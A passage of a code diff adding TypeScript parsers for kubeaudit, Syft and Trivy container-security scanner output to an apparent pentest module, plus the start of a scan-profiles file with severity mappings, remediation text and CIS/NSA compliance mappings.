+++ b/packages/opencode/src/pentest/containerscan/parsers/kubeaudit.ts
@@ -0,0 +1,363 @@
+/**
+ * @fileoverview Kubeaudit JSON Output Parser
+ *
+ * Parses Kubeaudit Kubernetes security auditor JSON output.
+ *
+ * @module pentest/containerscan/parsers/kubeaudit
+ */
+
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const log = Log.create({ service: "pentest.containerscan.parsers.kubeaudit" })
+
+/**
+ * Kubeaudit JSON output structure (JSONL format - one JSON object per line)
+ */
+interface KubeauditResult {
+  AuditResultName: string
+  ResourceApiVersion?: string
+  ResourceKind: string
+  ResourceName: string
+  ResourceNamespace?: string
+  Severity?: string
+  Message: string
+  PendingFix?: {
+    Container?: string
+    Metadata?: Record<string, unknown>
+  }
+  metadata?: Record<string, unknown>
+}
+
+/**
+ * Kubeaudit check categories
+ */
+const CHECK_CATEGORIES: Record<string, { category: ContainerScanTypes.FindingCategory; severity: ContainerScanTypes.Severity }> = {
+  // Privileged containers
+  PrivilegedAllowed: { category: "misconfiguration", severity: "critical" },
+  PrivilegedTrue: { category: "misconfiguration", severity: "critical" },
+  PrivilegedNil: { category: "misconfiguration", severity: "high" },
+
+  // Capabilities
+  CapabilityAdded: { category: "misconfiguration", severity: "high" },
+  CapabilityNotDropped: { category: "misconfiguration", severity: "medium" },
+  CapabilityShouldDropAll: { category: "misconfiguration", severity: "medium" },
+
+  // Root user
+  RunAsNonRootPSCNilCSCNil: { category: "misconfiguration", severity: "high" },
+  RunAsNonRootPSCFalseCSCNil: { category: "misconfiguration", severity: "high" },
+  RunAsUserPSCRoot: { category: "misconfiguration", severity: "high" },
+  RunAsUserCSCRoot: { category: "misconfiguration", severity: "high" },
+
+  // Privilege escalation
+  AllowPrivilegeEscalationNil: { category: "misconfiguration", severity: "high" },
+  AllowPrivilegeEscalationTrue: { category: "misconfiguration", severity: "high" },
+
+  // Read-only root filesystem
+  ReadOnlyRootFilesystemFalse: { category: "misconfiguration", severity: "medium" },
+  ReadOnlyRootFilesystemNil: { category: "misconfiguration", severity: "medium" },
+
+  // Resource limits
+  LimitsCPUNotSet: { category: "misconfiguration", severity: "low" },
+  LimitsMemoryNotSet: { category: "misconfiguration", severity: "low" },
+  LimitsNotSet: { category: "misconfiguration", severity: "low" },
+
+  // Host namespaces
+  HostNetworkTrue: { category: "misconfiguration", severity: "high" },
+  HostPIDTrue: { category: "misconfiguration", severity: "high" },
+  HostIPCTrue: { category: "misconfiguration", severity: "high" },
+
+  // Automount service account
+  AutomountServiceAccountTokenTrueAndDefaultSA: { category: "misconfiguration", severity: "medium" },
+  AutomountServiceAccountTokenNilAndDefaultSA: { category: "misconfiguration", severity: "medium" },
+
+  // Image
+  ImageTagMissing: { category: "misconfiguration", severity: "medium" },
+  ImageTagIncorrect: { category: "misconfiguration", severity: "low" },
+
+  // Seccomp
+  SeccompProfileMissing: { category: "misconfiguration", severity: "medium" },
+
+  // AppArmor
+  AppArmorAnnotationMissing: { category: "misconfiguration", severity: "low" },
+  AppArmorDisabled: { category: "misconfiguration", severity: "medium" },
+  AppArmorInvalidAnnotation: { category: "misconfiguration", severity: "low" },
+
+  // Network policies
+  MissingDefaultDenyIngressNetworkPolicy: { category: "network", severity: "medium" },
+  MissingDefaultDenyEgressNetworkPolicy: { category: "network", severity: "medium" },
+  MissingDefaultDenyIngressAndEgressNetworkPolicy: { category: "network", severity: "medium" },
+
+  // Default namespace
+  NamespaceDefault: { category: "misconfiguration", severity: "low" },
+}
+
+/**
+ * Kubeaudit parser namespace
+ */
+export namespace KubeauditParser {
+  /**
+   * Parse Kubeaudit JSONL output into findings
+   */
+  export function parse(output: string): ContainerScanTypes.ContainerFinding[] {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+    const lines = output.trim().split("\n")
+
+    for (const line of lines) {
+      if (!line.trim()) continue
+
+      try {
+        const result = JSON.parse(line) as KubeauditResult
+        const finding = parseResult(result)
+        if (finding) {
+          findings.push(finding)
+        }
+      } catch (error) {
+        log.warn("Failed to parse kubeaudit line", { line, error })
+      }
+    }
+
+    log.info("Kubeaudit output parsed", {
+      findings: findings.length,
+    })
+
+    return findings
+  }
+
+  /**
+   * Parse a single kubeaudit result
+   */
+  function parseResult(result: KubeauditResult): ContainerScanTypes.ContainerFinding | undefined {
+    const checkInfo = CHECK_CATEGORIES[result.AuditResultName]
+
+    // Use provided severity or fall back to check category
+    let severity: ContainerScanTypes.Severity = "medium"
+    if (result.Severity) {
+      severity = mapSeverity(result.Severity)
+    } else if (checkInfo) {
+      severity = checkInfo.severity
+    }
+
+    const category = checkInfo?.category || "misconfiguration"
+
+    return {
+      id: `kubeaudit-${result.AuditResultName}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category,
+      severity,
+      title: formatTitle(result.AuditResultName),
+      description: result.Message,
+      resource: {
+        type: "pod",
+        name: result.ResourceName,
+        namespace: result.ResourceNamespace,
+      },
+      remediation: getRemediation(result.AuditResultName, result.PendingFix),
+      evidence: {
+        auditResult: result.AuditResultName,
+        resourceKind: result.ResourceKind,
+        resourceApiVersion: result.ResourceApiVersion,
+        pendingFix: result.PendingFix,
+        metadata: result.metadata,
+      },
+      compliance: getComplianceMapping(result.AuditResultName),
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Build kubeaudit command
+   */
+  export function buildCommand(
+    options: {
+      namespace?: string
+      context?: string
+      manifest?: string
+      auditors?: string[]
+    } = {}
+  ): string {
+    const args = ["kubeaudit", "all", "--json"]
+
+    if (options.namespace) {
+      args.push("-n", options.namespace)
+    }
+
+    if (options.context) {
+      args.push("--context", options.context)
+    }
+
+    if (options.manifest) {
+      args.push("-f", options.manifest)
+    }
+
+    if (options.auditors && options.auditors.length > 0) {
+      // Run specific auditors instead of 'all'
+      args[1] = options.auditors.join(",")
+    }
+
+    return args.join(" ")
+  }
+
+  /**
+   * Get summary of findings by category
+   */
+  export function summarize(findings: ContainerScanTypes.ContainerFinding[]): {
+    total: number
+    bySeverity: Record<ContainerScanTypes.Severity, number>
+    byCategory: Record<string, number>
+    byResource: Record<string, number>
+    topIssues: { title: string; count: number }[]
+  } {
+    const bySeverity: Record<ContainerScanTypes.Severity, number> = {
+      critical: 0,
+      high: 0,
+      medium: 0,
+      low: 0,
+      negligible: 0,
+      unknown: 0,
+    }
+    const byCategory: Record<string, number> = {}
+    const byResource: Record<string, number> = {}
+    const issueCount: Record<string, number> = {}
+
+    for (const finding of findings) {
+      bySeverity[finding.severity]++
+      byCategory[finding.category] = (byCategory[finding.category] || 0) + 1
+      byResource[finding.resource.name] = (byResource[finding.resource.name] || 0) + 1
+      issueCount[finding.title] = (issueCount[finding.title] || 0) + 1
+    }
+
+    // Get top issues
+    const topIssues = Object.entries(issueCount)
+      .sort((a, b) => b[1] - a[1])
+      .slice(0, 5)
+      .map(([title, count]) => ({ title, count }))
+
+    return {
+      total: findings.length,
+      bySeverity,
+      byCategory,
+      byResource,
+      topIssues,
+    }
+  }
+
+  /**
+   * Map kubeaudit severity to standard severity
+   */
+  function mapSeverity(severity: string): ContainerScanTypes.Severity {
+    switch (severity.toLowerCase()) {
+      case "error":
+        return "high"
+      case "warning":
+        return "medium"
+      case "info":
+        return "low"
+      default:
+        return "medium"
+    }
+  }
+
+  /**
+   * Format audit result name into human-readable title
+   */
+  function formatTitle(name: string): string {
+    // Split camelCase and add spaces
+    return name
+      .replace(/([A-Z])/g, " $1")
+      .replace(/^./, (str) => str.toUpperCase())
+      .replace(/Psc/g, "Pod Security Context")
+      .replace(/Csc/g, "Container Security Context")
+      .replace(/Nil/g, "Not Set")
+      .replace(/Sa /g, "Service Account ")
+      .trim()
+  }
+
+  /**
+   * Get remediation advice for a finding
+   */
+  function getRemediation(auditResult: string, pendingFix?: KubeauditResult["PendingFix"]): string {
+    const remediations: Record<string, string> = {
+      PrivilegedTrue: "Set securityContext.privileged to false",
+      PrivilegedAllowed: "Remove allowPrivileged from PodSecurityPolicy or set to false",
+      CapabilityAdded: "Remove unnecessary capabilities from securityContext.capabilities.add",
+      CapabilityShouldDropAll: "Add 'ALL' to securityContext.capabilities.drop",
+      RunAsNonRootPSCNilCSCNil: "Set securityContext.runAsNonRoot to true",
+      RunAsUserPSCRoot: "Set securityContext.runAsUser to a non-root UID (>0)",
+      AllowPrivilegeEscalationTrue: "Set securityContext.allowPrivilegeEscalation to false",
+      ReadOnlyRootFilesystemFalse: "Set securityContext.readOnlyRootFilesystem to true",
+      LimitsNotSet: "Set resources.limits for CPU and memory",
+      HostNetworkTrue: "Set hostNetwork to false unless required",
+      HostPIDTrue: "Set hostPID to false unless required",
+      HostIPCTrue: "Set hostIPC to false unless required",
+      AutomountServiceAccountTokenTrueAndDefaultSA: "Set automountServiceAccountToken to false or use a specific service account",
+      ImageTagMissing: "Specify an explicit image tag instead of using 'latest' or no tag",
+      SeccompProfileMissing: "Add a seccomp profile annotation or securityContext.seccompProfile",
+      MissingDefaultDenyIngressNetworkPolicy: "Create a NetworkPolicy with default deny ingress rules",
+      MissingDefaultDenyEgressNetworkPolicy: "Create a NetworkPolicy with default deny egress rules",
+      NamespaceDefault: "Deploy resources to a dedicated namespace instead of default",
+    }
+
+    let remediation = remediations[auditResult] || "Review and fix the security configuration"
+
+    if (pendingFix?.Container) {
+      remediation += ` (Container: ${pendingFix.Container})`
+    }
+
+    return remediation
+  }
+
+  /**
+   * Get compliance mapping for a finding
+   */
+  function getComplianceMapping(auditResult: string): ContainerScanTypes.ContainerFinding["compliance"] {
+    const mappings: Record<string, { framework: ContainerScanTypes.ComplianceFramework; control: string }[]> = {
+      PrivilegedTrue: [
+        { framework: "cis-kubernetes", control: "5.2.1" },
+        { framework: "nsa-cisa", control: "Privileged Containers" },
+      ],
+      CapabilityAdded: [
+        { framework: "cis-kubernetes", control: "5.2.7" },
+        { framework: "nsa-cisa", control: "Linux Capabilities" },
+      ],
+      RunAsNonRootPSCNilCSCNil: [
+        { framework: "cis-kubernetes", control: "5.2.6" },
+        { framework: "nsa-cisa", control: "Non-root Containers" },
+      ],
+      AllowPrivilegeEscalationTrue: [
+        { framework: "cis-kubernetes", control: "5.2.5" },
+      ],
+      ReadOnlyRootFilesystemFalse: [
+        { framework: "cis-kubernetes", control: "5.2.4" },
+        { framework: "nsa-cisa", control: "Immutable Container Filesystems" },
+      ],
+      HostNetworkTrue: [
+        { framework: "cis-kubernetes", control: "5.2.4" },
+        { framework: "nsa-cisa", control: "Host Namespaces" },
+      ],
+      HostPIDTrue: [
+        { framework: "cis-kubernetes", control: "5.2.2" },
+        { framework: "nsa-cisa", control: "Host Namespaces" },
+      ],
+      HostIPCTrue: [
+        { framework: "cis-kubernetes", control: "5.2.3" },
+        { framework: "nsa-cisa", control: "Host Namespaces" },
+      ],
+      LimitsNotSet: [
+        { framework: "cis-kubernetes", control: "5.4.1" },
+      ],
+      SeccompProfileMissing: [
+        { framework: "cis-kubernetes", control: "5.7.2" },
+        { framework: "nsa-cisa", control: "Seccomp" },
+      ],
+      MissingDefaultDenyIngressNetworkPolicy: [
+        { framework: "cis-kubernetes", control: "5.3.2" },
+        { framework: "nsa-cisa", control: "Network Policies" },
+      ],
+    }
+
+    return mappings[auditResult]?.map((m) => ({
+      ...m,
+      description: `${m.framework.toUpperCase()} - ${m.control}`,
+    }))
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/parsers/syft.ts b/packages/opencode/src/pentest/containerscan/parsers/syft.ts
new file mode 100644
index 00000000000..e9ad9dd7bc5
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/parsers/syft.ts
@@ -0,0 +1,377 @@
+/**
+ * @fileoverview Syft SBOM Parser
+ *
+ * Parses Syft SBOM generator JSON output.
+ *
+ * @module pentest/containerscan/parsers/syft
+ */
+
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const log = Log.create({ service: "pentest.containerscan.parsers.syft" })
+
+/**
+ * Syft JSON output structure
+ */
+interface SyftOutput {
+  artifacts: SyftArtifact[]
+  artifactRelationships?: SyftRelationship[]
+  source: {
+    type: string
+    target: {
+      userInput: string
+      imageID?: string
+      manifestDigest?: string
+      mediaType?: string
+      tags?: string[]
+      layers?: { mediaType: string; digest: string; size: number }[]
+    }
+  }
+  distro?: {
+    name: string
+    version: string
+    idLike?: string[]
+  }
+  descriptor?: {
+    name: string
+    version: string
+    configuration?: Record<string, unknown>
+  }
+  schema?: {
+    version: string
+    url: string
+  }
+}
+
+interface SyftArtifact {
+  id: string
+  name: string
+  version: string
+  type: string
+  foundBy: string
+  locations: { path: string; layerID?: string; accessPath?: string }[]
+  language?: string
+  licenses?: SyftLicense[]
+  cpes?: string[]
+  purl?: string
+  metadataType?: string
+  metadata?: Record<string, unknown>
+}
+
+interface SyftLicense {
+  value: string
+  spdxExpression?: string
+  type: string
+  urls?: string[]
+  locations?: { path: string; accessPath?: string }[]
+}
+
+interface SyftRelationship {
+  parent: string
+  child: string
+  type: string
+  metadata?: Record<string, unknown>
+}
+
+/**
+ * CycloneDX format for SBOM export
+ */
+interface CycloneDXOutput {
+  bomFormat: string
+  specVersion: string
+  version: number
+  metadata: {
+    timestamp: string
+    tools?: { vendor: string; name: string; version: string }[]
+    component?: { type: string; name: string; version?: string }
+  }
+  components: {
+    type: string
+    name: string
+    version: string
+    purl?: string
+    licenses?: { license: { id?: string; name?: string } }[]
+    hashes?: { alg: string; content: string }[]
+  }[]
+}
+
+/**
+ * Syft parser namespace
+ */
+export namespace SyftParser {
+  /**
+   * Parse Syft JSON output into SBOM
+   */
+  export function parse(output: string, image: string): ContainerScanTypes.SBOM {
+    try {
+      const data = JSON.parse(output) as SyftOutput
+
+      const components: ContainerScanTypes.SBOMComponent[] = []
+
+      for (const artifact of data.artifacts || []) {
+        components.push({
+          name: artifact.name,
+          version: artifact.version,
+          type: mapArtifactType(artifact.type),
+          purl: artifact.purl,
+          cpe: artifact.cpes?.[0],
+          licenses: extractLicenses(artifact.licenses),
+          supplier: extractSupplier(artifact),
+        })
+      }
+
+      log.info("Syft output parsed", {
+        image,
+        components: components.length,
+      })
+
+      return {
+        id: `sbom_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`,
+        image,
+        format: "syft",
+        createdAt: Date.now(),
+        components,
+        metadata: {
+          tool: "syft",
+          toolVersion: data.descriptor?.version,
+        },
+      }
+    } catch (error) {
+      log.error("Failed to parse Syft output", { error, image })
+      throw new Error(`Failed to parse Syft output: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Parse CycloneDX format output
+   */
+  export function parseCycloneDX(output: string, image: string): ContainerScanTypes.SBOM {
+    try {
+      const data = JSON.parse(output) as CycloneDXOutput
+
+      const components: ContainerScanTypes.SBOMComponent[] = []
+
+      for (const comp of data.components || []) {
+        const licenses: string[] = []
+        for (const lic of comp.licenses || []) {
+          if (lic.license.id) licenses.push(lic.license.id)
+          else if (lic.license.name) licenses.push(lic.license.name)
+        }
+
+        const hashes: Record<string, string> = {}
+        for (const hash of comp.hashes || []) {
+          hashes[hash.alg] = hash.content
+        }
+
+        components.push({
+          name: comp.name,
+          version: comp.version,
+          type: mapComponentType(comp.type),
+          purl: comp.purl,
+          licenses: licenses.length > 0 ? licenses : undefined,
+          hashes: Object.keys(hashes).length > 0 ? hashes : undefined,
+        })
+      }
+
+      log.info("CycloneDX output parsed", {
+        image,
+        components: components.length,
+      })
+
+      return {
+        id: `sbom_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`,
+        image,
+        format: "cyclonedx",
+        createdAt: Date.now(),
+        components,
+        metadata: {
+          tool: "syft",
+        },
+      }
+    } catch (error) {
+      log.error("Failed to parse CycloneDX output", { error, image })
+      throw new Error(`Failed to parse CycloneDX output: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Build Syft command for SBOM generation
+   */
+  export function buildCommand(
+    image: string,
+    options: {
+      format?: "json" | "cyclonedx-json" | "spdx-json" | "table"
+      scope?: "squashed" | "all-layers"
+    } = {}
+  ): string {
+    const args = ["syft", image]
+
+    // Output format
+    const format = options.format || "json"
+    args.push("-o", format)
+
+    // Scope
+    if (options.scope) {
+      args.push("--scope", options.scope)
+    }
+
+    return args.join(" ")
+  }
+
+  /**
+   * Get component summary from SBOM
+   */
+  export function summarize(sbom: ContainerScanTypes.SBOM): {
+    totalComponents: number
+    byType: Record<string, number>
+    byLicense: Record<string, number>
+    topPackages: { name: string; version: string; type: string }[]
+  } {
+    const byType: Record<string, number> = {}
+    const byLicense: Record<string, number> = {}
+
+    for (const comp of sbom.components) {
+      // Count by type
+      byType[comp.type] = (byType[comp.type] || 0) + 1
+
+      // Count by license
+      for (const license of comp.licenses || []) {
+        byLicense[license] = (byLicense[license] || 0) + 1
+      }
+    }
+
+    // Get top packages (first 10)
+    const topPackages = sbom.components.slice(0, 10).map((c) => ({
+      name: c.name,
+      version: c.version,
+      type: c.type,
+    }))
+
+    return {
+      totalComponents: sbom.components.length,
+      byType,
+      byLicense,
+      topPackages,
+    }
+  }
+
+  /**
+   * Find component by name
+   */
+  export function findComponent(
+    sbom: ContainerScanTypes.SBOM,
+    name: string
+  ): ContainerScanTypes.SBOMComponent | undefined {
+    return sbom.components.find(
+      (c) => c.name.toLowerCase() === name.toLowerCase() || c.name.toLowerCase().includes(name.toLowerCase())
+    )
+  }
+
+  /**
+   * Check for known vulnerable packages
+   */
+  export function findVulnerablePackages(
+    sbom: ContainerScanTypes.SBOM,
+    knownVulnerable: { name: string; vulnerableVersions: string[] }[]
+  ): { component: ContainerScanTypes.SBOMComponent; matches: string[] }[] {
+    const results: { component: ContainerScanTypes.SBOMComponent; matches: string[] }[] = []
+
+    for (const vuln of knownVulnerable) {
+      for (const comp of sbom.components) {
+        if (comp.name.toLowerCase() === vuln.name.toLowerCase()) {
+          if (vuln.vulnerableVersions.includes(comp.version)) {
+            results.push({
+              component: comp,
+              matches: vuln.vulnerableVersions,
+            })
+          }
+        }
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Map Syft artifact type to SBOM component type
+   */
+  function mapArtifactType(type: string): ContainerScanTypes.SBOMComponent["type"] {
+    switch (type.toLowerCase()) {
+      case "apk":
+      case "deb":
+      case "rpm":
+      case "alpm":
+      case "dpkg":
+        return "operating-system"
+      case "gem":
+      case "npm":
+      case "python":
+      case "pip":
+      case "poetry":
+      case "go-module":
+      case "cargo":
+      case "maven":
+      case "nuget":
+      case "composer":
+        return "library"
+      case "binary":
+        return "application"
+      default:
+        return "library"
+    }
+  }
+
+  /**
+   * Map CycloneDX component type
+   */
+  function mapComponentType(type: string): ContainerScanTypes.SBOMComponent["type"] {
+    switch (type.toLowerCase()) {
+      case "library":
+        return "library"
+      case "application":
+        return "application"
+      case "framework":
+        return "framework"
+      case "operating-system":
+        return "operating-system"
+      case "device":
+        return "device"
+      case "file":
+        return "file"
+      default:
+        return "library"
+    }
+  }
+
+  /**
+   * Extract license strings from Syft license objects
+   */
+  function extractLicenses(licenses?: SyftLicense[]): string[] | undefined {
+    if (!licenses || licenses.length === 0) return undefined
+
+    const result: string[] = []
+    for (const lic of licenses) {
+      if (lic.spdxExpression) {
+        result.push(lic.spdxExpression)
+      } else if (lic.value) {
+        result.push(lic.value)
+      }
+    }
+
+    return result.length > 0 ? result : undefined
+  }
+
+  /**
+   * Extract supplier from artifact metadata
+   */
+  function extractSupplier(artifact: SyftArtifact): string | undefined {
+    if (artifact.metadata) {
+      const meta = artifact.metadata as Record<string, unknown>
+      if (meta.author) return String(meta.author)
+      if (meta.maintainer) return String(meta.maintainer)
+      if (meta.vendor) return String(meta.vendor)
+    }
+    return undefined
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/parsers/trivy.ts b/packages/opencode/src/pentest/containerscan/parsers/trivy.ts
new file mode 100644
index 00000000000..cd6a0832faf
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/parsers/trivy.ts
@@ -0,0 +1,327 @@
+/**
+ * @fileoverview Trivy JSON Output Parser
+ *
+ * Parses Trivy vulnerability scanner JSON output.
+ *
+ * @module pentest/containerscan/parsers/trivy
+ */
+
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const log = Log.create({ service: "pentest.containerscan.parsers.trivy" })
+
+/**
+ * Trivy JSON output structure
+ */
+interface TrivyOutput {
+  SchemaVersion?: number
+  ArtifactName?: string
+  ArtifactType?: string
+  Metadata?: {
+    OS?: { Family: string; Name: string }
+    ImageID?: string
+    DiffIDs?: string[]
+    RepoTags?: string[]
+    RepoDigests?: string[]
+    ImageConfig?: Record<string, unknown>
+  }
+  Results?: TrivyResult[]
+}
+
+interface TrivyResult {
+  Target: string
+  Class: string
+  Type: string
+  Vulnerabilities?: TrivyVulnerability[]
+  Secrets?: TrivySecret[]
+  Misconfigurations?: TrivyMisconfiguration[]
+}
+
+interface TrivyVulnerability {
+  VulnerabilityID: string
+  PkgID?: string
+  PkgName: string
+  InstalledVersion: string
+  FixedVersion?: string
+  Layer?: { Digest?: string; DiffID?: string }
+  SeveritySource?: string
+  PrimaryURL?: string
+  DataSource?: { ID: string; Name: string; URL: string }
+  Title?: string
+  Description?: string
+  Severity: string
+  CweIDs?: string[]
+  CVSS?: Record<string, { V2Score?: number; V3Score?: number; V2Vector?: string; V3Vector?: string }>
+  References?: string[]
+  PublishedDate?: string
+  LastModifiedDate?: string
+}
+
+interface TrivySecret {
+  RuleID: string
+  Category: string
+  Severity: string
+  Title: string
+  StartLine: number
+  EndLine: number
+  Match: string
+  Layer?: { Digest?: string; DiffID?: string }
+}
+
+interface TrivyMisconfiguration {
+  Type: string
+  ID: string
+  AVDID?: string
+  Title: string
+  Description: string
+  Message?: string
+  Resolution?: string
+  Severity: string
+  PrimaryURL?: string
+  References?: string[]
+  Status: string
+  Layer?: { Digest?: string; DiffID?: string }
+  CauseMetadata?: {
+    Resource?: string
+    Provider?: string
+    Service?: string
+    StartLine?: number
+    EndLine?: number
+    Code?: { Lines?: { Number: number; Content: string }[] }
+  }
+}
+
+/**
+ * Trivy parser namespace
+ */
+export namespace TrivyParser {
+  /**
+   * Parse Trivy JSON output into ImageScanResult
+   */
+  export function parse(output: string, image: string): ContainerScanTypes.ImageScanResult {
+    try {
+      const data = JSON.parse(output) as TrivyOutput
+
+      const vulnerabilities: ContainerScanTypes.ImageVulnerability[] = []
+      const stats = {
+        critical: 0,
+        high: 0,
+        medium: 0,
+        low: 0,
+        negligible: 0,
+        unknown: 0,
+        total: 0,
+        fixable: 0,
+      }
+
+      // Process each result (target)
+      for (const result of data.Results || []) {
+        for (const vuln of result.Vulnerabilities || []) {
+          const severity = mapSeverity(vuln.Severity)
+
+          // Get CVSS info
+          let cvssScore: number | undefined
+          let cvssVector: string | undefined
+          if (vuln.CVSS) {
+            const nvdCvss = vuln.CVSS["nvd"]
+            if (nvdCvss?.V3Score) {
+              cvssScore = nvdCvss.V3Score
+              cvssVector = nvdCvss.V3Vector
+            } else if (nvdCvss?.V2Score) {
+              cvssScore = nvdCvss.V2Score
+              cvssVector = nvdCvss.V2Vector
+            }
+          }
+
+          vulnerabilities.push({
+            id: vuln.VulnerabilityID,
+            cveId: vuln.VulnerabilityID.startsWith("CVE-") ? vuln.VulnerabilityID : undefined,
+            severity,
+            title: vuln.Title || vuln.VulnerabilityID,
+            description: vuln.Description,
+            packageName: vuln.PkgName,
+            installedVersion: vuln.InstalledVersion,
+            fixedVersion: vuln.FixedVersion,
+            layer: vuln.Layer?.DiffID || vuln.Layer?.Digest,
+            cvss: cvssScore ? { score: cvssScore, vector: cvssVector } : undefined,
+            references: vuln.References,
+            publishedDate: vuln.PublishedDate,
+          })
+
+          // Update stats
+          stats[severity]++
+          stats.total++
+          if (vuln.FixedVersion) {
+            stats.fixable++
+          }
+        }
+      }
+
+      log.info("Trivy output parsed", {
+        image,
+        vulnerabilities: stats.total,
+        critical: stats.critical,
+        high: stats.high,
+      })
+
+      return {
+        image,
+        imageId: data.Metadata?.ImageID,
+        digest: data.Metadata?.RepoDigests?.[0],
+        vulnerabilities,
+        scanTool: "trivy",
+        scannedAt: Date.now(),
+        stats,
+      }
+    } catch (error) {
+      log.error("Failed to parse Trivy output", { error, image })
+      throw new Error(`Failed to parse Trivy output: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Parse Trivy secrets output
+   */
+  export function parseSecrets(output: string): ContainerScanTypes.ContainerFinding[] {
+    try {
+      const data = JSON.parse(output) as TrivyOutput
+      const findings: ContainerScanTypes.ContainerFinding[] = []
+
+      for (const result of data.Results || []) {
+        for (const secret of result.Secrets || []) {
+          findings.push({
+            id: `trivy-secret-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+            category: "secret",
+            severity: mapSeverity(secret.Severity),
+            title: secret.Title,
+            description: `Secret detected: ${secret.Category}`,
+            resource: {
+              type: "image",
+              name: data.ArtifactName || "unknown",
+            },
+            evidence: {
+              ruleId: secret.RuleID,
+              category: secret.Category,
+              startLine: secret.StartLine,
+              endLine: secret.EndLine,
+              layer: secret.Layer?.DiffID,
+            },
+            detectedAt: Date.now(),
+          })
+        }
+      }
+
+      return findings
+    } catch (error) {
+      log.error("Failed to parse Trivy secrets output", { error })
+      return []
+    }
+  }
+
+  /**
+   * Parse Trivy misconfiguration output
+   */
+  export function parseMisconfigurations(output: string): ContainerScanTypes.ContainerFinding[] {
+    try {
+      const data = JSON.parse(output) as TrivyOutput
+      const findings: ContainerScanTypes.ContainerFinding[] = []
+
+      for (const result of data.Results || []) {
+        for (const misconfig of result.Misconfigurations || []) {
+          if (misconfig.Status === "PASS") continue
+
+          findings.push({
+            id: misconfig.ID || `trivy-misconfig-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+            category: "misconfiguration",
+            severity: mapSeverity(misconfig.Severity),
+            title: misconfig.Title,
+            description: misconfig.Description,
+            resource: {
+              type: "image",
+              name: data.ArtifactName || "unknown",
+            },
+            remediation: misconfig.Resolution,
+            references: misconfig.References,
+            evidence: {
+              type: misconfig.Type,
+              avdId: misconfig.AVDID,
+              message: misconfig.Message,
+              causeMetadata: misconfig.CauseMetadata,
+            },
+            detectedAt: Date.now(),
+          })
+        }
+      }
+
+      return findings
+    } catch (error) {
+      log.error("Failed to parse Trivy misconfiguration output", { error })
+      return []
+    }
+  }
+
+  /**
+   * Build Trivy command for image scanning
+   */
+  export function buildCommand(
+    image: string,
+    options: {
+      severities?: ContainerScanTypes.Severity[]
+      ignoreUnfixed?: boolean
+      timeout?: number
+      scanSecrets?: boolean
+      scanMisconfig?: boolean
+    } = {}
+  ): string {
+    const args = ["trivy", "image", "--format", "json"]
+
+    // Severity filter
+    if (options.severities && options.severities.length > 0) {
+      const trivySeverities = options.severities.map((s) => s.toUpperCase()).join(",")
+      args.push("--severity", trivySeverities)
+    }
+
+    // Ignore unfixed
+    if (options.ignoreUnfixed) {
+      args.push("--ignore-unfixed")
+    }
+
+    // Timeout
+    if (options.timeout) {
+      args.push("--timeout", `${Math.floor(options.timeout / 1000)}s`)
+    }
+
+    // Scanners
+    const scanners = ["vuln"]
+    if (options.scanSecrets) scanners.push("secret")
+    if (options.scanMisconfig) scanners.push("misconfig")
+    args.push("--scanners", scanners.join(","))
+
+    // Image
+    args.push(image)
+
+    return args.join(" ")
+  }
+
+  /**
+   * Map Trivy severity to standard severity
+   */
+  function mapSeverity(severity: string): ContainerScanTypes.Severity {
+    switch (severity.toUpperCase()) {
+      case "CRITICAL":
+        return "critical"
+      case "HIGH":
+        return "high"
+      case "MEDIUM":
+        return "medium"
+      case "LOW":
+        return "low"
+      case "NEGLIGIBLE":
+      case "NONE":
+        return "negligible"
+      default:
+        return "unknown"
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/profiles.ts b/packages/opencode/src/pentest/containerscan/profiles.ts
new file mode 100644
index 00000000000..298d48a60a1
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/profiles.ts
@@ -0,0 +1,318 @@
+/**
+ * @fileoverview Container Scanner Profiles
+ *
+ * Pre-defined scan profiles for container security scanning.
+ *
+ * @module pentest/containerscan/profiles
+ */
+
+import { ContainerScanTypes } from "./types"
+
+/**
+ * Container scanner profiles namespace.
+ */
+export namespace ContainerScanProfiles {
+  /**
+   * Discovery profile - enumerate images, containers, registries
+   */
+  export const Discovery: ContainerScanTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Enumerate container images, running containers, and registries without active scanning",
+    image: {
+      enabled: true,
+      scanVulnerabilities: false,
+      generateSBOM: false,
+      scanSecrets: false,
+      severityThreshold: "low",
+      ignoreUnfixed: false,
+    },
+    runtime: {
+      enabled: true,
+      checkPrivileged: false,
+      checkRootUser: false,
+      checkCapabilities: false,
+      checkMounts: false,
+      checkNetworking: false,
+      checkDaemon: false,
+    },
+    kubernetes: {
+      enabled: false,
+      scanPods: false,
+      scanRBAC: false,
+      scanNetworkPolicies: false,
+      scanSecrets: false,
+      scanAdmission: false,
+    },
+    compliance: {
+      enabled: false,
+      frameworks: [],
+    },
+    externalTools: [],
+    timeout: 60000,
+  }
+
+  /**
+   * Quick profile - fast vulnerability scan
+   */
+  export const Quick: ContainerScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast vulnerability scan focusing on critical and high severity issues",
+    image: {
+      enabled: true,
+      scanVulnerabilities: true,
+      generateSBOM: false,
+      scanSecrets: false,
+      severityThreshold: "high",
+      ignoreUnfixed: true,
+    },
+    runtime: {
+      enabled: true,
+      checkPrivileged: true,
+      checkRootUser: true,
+      checkCapabilities: false,
+      checkMounts: false,
+      checkNetworking: false,
+      checkDaemon: false,
+    },
+    kubernetes: {
